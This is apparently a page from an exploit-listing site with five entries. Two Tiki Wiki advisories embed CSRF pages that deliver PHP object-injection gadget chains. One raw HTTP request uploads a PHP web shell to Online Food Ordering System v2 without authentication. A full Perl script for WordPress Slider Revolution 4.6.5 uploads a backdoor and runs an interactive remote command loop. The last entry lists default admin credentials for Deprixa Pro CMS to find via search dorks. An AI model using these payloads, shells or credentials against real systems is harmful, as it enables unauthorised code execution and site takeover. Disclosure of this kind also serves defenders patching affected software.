Latest exploits :: CodePwn

<pre><code>---------------------------------------------------------------------------------------------------- Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP Object Injection Vulnerability ---------------------------------------------------------------------------------------------------- [-] Software Link: https://tiki.org [-] Affected Versions: Version 24.1 and prior versions. [-] Vulnerability Description: The vulnerability is located in the /lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when importing data from WordPress sites through the Tiki Importer, user input passed through the uploaded XML file is being used in a call to the unserialize() PHP function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires an admin account (specifically, the ‘tiki_p_admin_importer’ permission). However, due to the CSRF vulnerability described in KIS-2023-01, this vulnerability might also be exploited by tricking a victim user into opening a web page like the following: <html> <form action="http://localhost/tiki/tiki-importer.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="importerClassName" value="TikiImporter_Blog_Wordpress" /> <input type="hidden" name="importAttachments" value="on" /> <input type="file" name="importFile" id="fileinput"/> </form> <script> const xmlContent = atob("PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAw ZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg=="); const fileInput = document.getElementById("fileinput"); const dataTransfer = new DataTransfer(); const file = new File([xmlContent], "test.xml", {type: "text/xml"}); dataTransfer.items.add(file); fileInput.files = dataTransfer.files; document.forms[0].submit(); </script> </html> [-] Solution: Upgrade to version 24.2 or later. [-] Disclosure Timeline: [07/03/2022] - Vendor notified [23/08/2022] - Version 24.1 released [09/01/2023] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-22851 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2023-04 </code></pre>

<pre><code>----------------------------------------------------------------------------- Tiki Wiki CMS Groupware <= 24.0 (grid.php) PHP Object Injection Vulnerability ----------------------------------------------------------------------------- [-] Software Link: https://tiki.org [-] Affected Versions: Version 24.0 and prior versions. [-] Vulnerability Description: The vulnerability is located in the /lib/sheet/grid.php script, specifically into the TikiSheetSerializeHandler::_load() method, which is using the unserialize() PHP function with user-controlled input. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires the “Spreadsheets” feature to be enabled and an account with permissions to create a new sheet. However, due to the CSRF vulnerability described in KIS-2023-01, this vulnerability might also be exploited by tricking a victim user into opening a web page like the following: <html> <form action="http://localhost/tiki/tiki-import_sheet.php?sheetId=1" method="POST" enctype="multipart/form-data"> <input type="hidden" name="handler" value="TikiSheetSerializeHandler" /> <input type="file" name="file" id="fileinput"/> </form> <script> const popChain = 'O:25:"Search_Elastic_Connection":1:{S:31:"\00Search_Elastic_Connection\00bulk";O:28:"Search_Elastic_BulkOperation":3:{S:35:"\00Search_Elastic_BulkOperation\00count";i:1;S:38:"\00Search_Elastic_BulkOperation\00callback";S:14:"call_user_func";S:36:"\00Search_Elastic_BulkOperation\00buffer";a:2:{i:0;O:22:"Tracker_Field_Computed":3:{S:32:"\00Tracker_Field_Abstract\00itemData";a:1:{S:6:"itemId";i:1;}S:31:"\00Tracker_Field_Abstract\00options";O:15:"Tracker_Options":1:{S:21:"\00Tracker_Options\00data";a:1:{S:7:"formula";S:14:"null;phpinfo()";}}S:41:"\00Tracker_Field_Abstract\00trackerDefinition";O:18:"Tracker_Definition":0:{}}i:1;S:12:"getFieldData";}}}'; const fileInput = document.getElementById("fileinput"); const dataTransfer = new DataTransfer(); const file = new File([popChain], "test"); dataTransfer.items.add(file); fileInput.files = dataTransfer.files; document.forms[0].submit(); </script> </html> [-] Solution: Upgrade to version 24.1 or later. [-] Disclosure Timeline: [07/03/2022] - Vendor notified [23/08/2022] - Version 24.1 released [09/01/2023] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-22850 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2023-03 </code></pre>

<pre><code># Exploit Title: Online Food Ordering System v2 - Remote Code Execution (RCE) (Unauthenticated) # Date: 01/10/2023 # Exploit Author: Hakan Sonay # Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code # Version: 2.0 # Tested on: Windows 10 / XAMPP ############## Unauthenticated File Upload Request ############## POST /fos/admin/ajax.php?action=save_settings HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------19276025152284567381240485635 Content-Length: 831 Origin: http://localhost Connection: close Referer: http://localhost/fos/admin/index.php?page=site_settings Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------19276025152284567381240485635 Content-Disposition: form-data; name="name" Online Food Ordering System V2 -----------------------------19276025152284567381240485635 Content-Disposition: form-data; name="email" info@sample.com -----------------------------19276025152284567381240485635 Content-Disposition: form-data; name="contact" +6948 8542 623 -----------------------------19276025152284567381240485635 Content-Disposition: form-data; name="about" shell command:/assets/img/<file_name>.php?cmd=whoami -----------------------------19276025152284567381240485635 Content-Disposition: form-data; name="img"; filename="rev_shell.php" Content-Type: text/php <?php echo system($_GET['cmd']); ?> -----------------------------19276025152284567381240485635-- ############## Command Execution Request ############## http://localhost/fos/assets/img/****rev_shell.php?cmd=[Payload] </code></pre>

<pre><code>==================================================================================================================================== | # Title : WordPress - Slider Revolution 4.6.5 WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : https://www.sliderrevolution.com/ | | # Dork : index off revslider\backup | ==================================================================================================================================== [+] poc : [+] Web shell upload : The following perl exploit will attempt to load the HTTP php shell through the update_plugin function To use the exploit, be sure to compress the backdoor file Because the exploit uploads a compressed file to the target [+] simple backdoor : <?php $cmd = $_GET['cmd']; system($cmd); ?> [+] Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension (indoushka.zip) [+] The exploit and the backdoor must be in the same folder and path [+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine [+] Perl exploit : #!/usr/bin/perl # # Title :WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit # Author :indoushka # Vendor :https://www.sliderrevolution.com/ use LWP::UserAgent; use MIME::Base64; use strict; sub banner { system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print " ============[+] Author : indoushka[+]===================\n"; print "[+] Slider Revolution 4.6.5 shell upload 0-day exploit [+]\n"; print " ======================================================== \n"; print "[+] Uploading an web shell: [+]\n"; print "[+] The following perl exploit will attempt to load the [+]\n"; print "[+] HTTP php backdoor through the update_plugin function [+]\n"; print "[+] To use the exploit, make sure you compress the backdoor[+]\n"; print "============================================================== \n"; system('color a'); } if (!defined ($ARGV[0] && $ARGV[1])) { banner(); print "perl $0 <target> <plugin>\n"; print "perl $0 http://localhost revslider\n"; exit; } my $zip1 = "indoushka.zip"; unless (-e ($zip1)) { banner(); print "[-] $zip1 not found! RTFM\n"; exit; } my $host = $ARGV[0]; my $plugin = $ARGV[1]; my $action; my $update_file; if ($plugin eq "revslider") { $action = "revslider_ajax_action"; $update_file = "$zip1"; } elsif ($plugin eq "showbiz") { $action = "showbiz_ajax_action"; } else { banner(); print "[-] Wrong plugin name\n"; print "perl $0 <target> <plugin>\n"; print "perl $0 http://localhost revslider\n"; exit; } my $target = "wp-admin/admin-ajax.php"; my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; sub randomagent { my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' ); my $random = $array[rand @array]; return($random); } my $useragent = randomagent(); my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout(10); $ua->agent($useragent); my $status = $ua->get("$host/$target"); unless ($status->is_success) { banner(); print "[-] Xploit failed: " . $status->status_line . "\n"; exit; } banner(); print "[*] Target set to $plugin\n"; print "[*] MorXploiting $host\n"; my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]); print "[*] Sent payload\n"; if ($exploit->decoded_content =~ /Wrong update extracted folder/) { print "[+] Payload successfully executed\n"; } elsif ($exploit->decoded_content =~ /Wrong request/) { print "[-] Payload failed: Not vulnerable\n"; exit; } elsif ($exploit->decoded_content =~ m/0$/) { print "[-] Payload failed: Plugin unavailable\n"; exit; } else { $exploit->decoded_content =~ /<\/b>(.*?) /; print "[-] Payload failed:$1\n"; print "[-] " . $exploit->decoded_content unless (defined $1); print "\n"; exit; } print "[*] Checking if shell was uploaded\n"; sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] } my $rndstr = rndstr(8, 1..9, 'a'..'z'); my $cmd1 = encode_base64("echo $rndstr"); my $status = $ua->get("$host/$shell?cmd=$cmd1"); if ($status->decoded_content =~ /system has been disabled/) { print "[-] Xploit failed: system() has been disabled\n"; exit; } elsif ($status->decoded_content !~ /$rndstr/) { print "[-] Xploit failed: " . $status->status_line . "\n"; exit; } elsif ($status->decoded_content =~ /$rndstr/) { print "[+] Shell successfully uploaded\n"; } my $cmd2 = encode_base64("whoami"); my $whoami = $ua->get("$host/$shell?cmd=$cmd2"); my $cmd3 = encode_base64("uname -n"); my $uname = $ua->get("$host/$shell?cmd=$cmd3"); my $cmd4 = encode_base64("id"); my $id = $ua->get("$host/$shell?cmd=$cmd4"); my $cmd5 = encode_base64("uname -a"); my $unamea = $ua->get("$host/$shell?cmd=$cmd5"); print $unamea->decoded_content; print $id->decoded_content; my $wa = $whoami->decoded_content; my $un = $uname->decoded_content; chomp($wa); chomp($un); while () { print "\n$wa\@$un:~\$ "; chomp(my $cmd=<STDIN>); if ($cmd eq "exit") { print "Aurevoir!\n"; exit; } my $ucmd = encode_base64("$cmd"); my $output = $ua->get("$host/$shell?cmd=$ucmd"); print $output->decoded_content; } Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg | | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Deprixa Pro CMS 3.2.5 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | | # Vendor : https://themes-dl.com/nulled-courier-deprixa-pro-integrated-web-system-v3-2-5-free-download/ | | # Dork : | ==================================================================================================================================== poc : [+] The vulnerability is about leaving the default settings During the installation of the script and using the default username and password [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : user=admin & pass=09731 [+] https://127.0.0.1/deprixalogisticsonline/dashboard/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>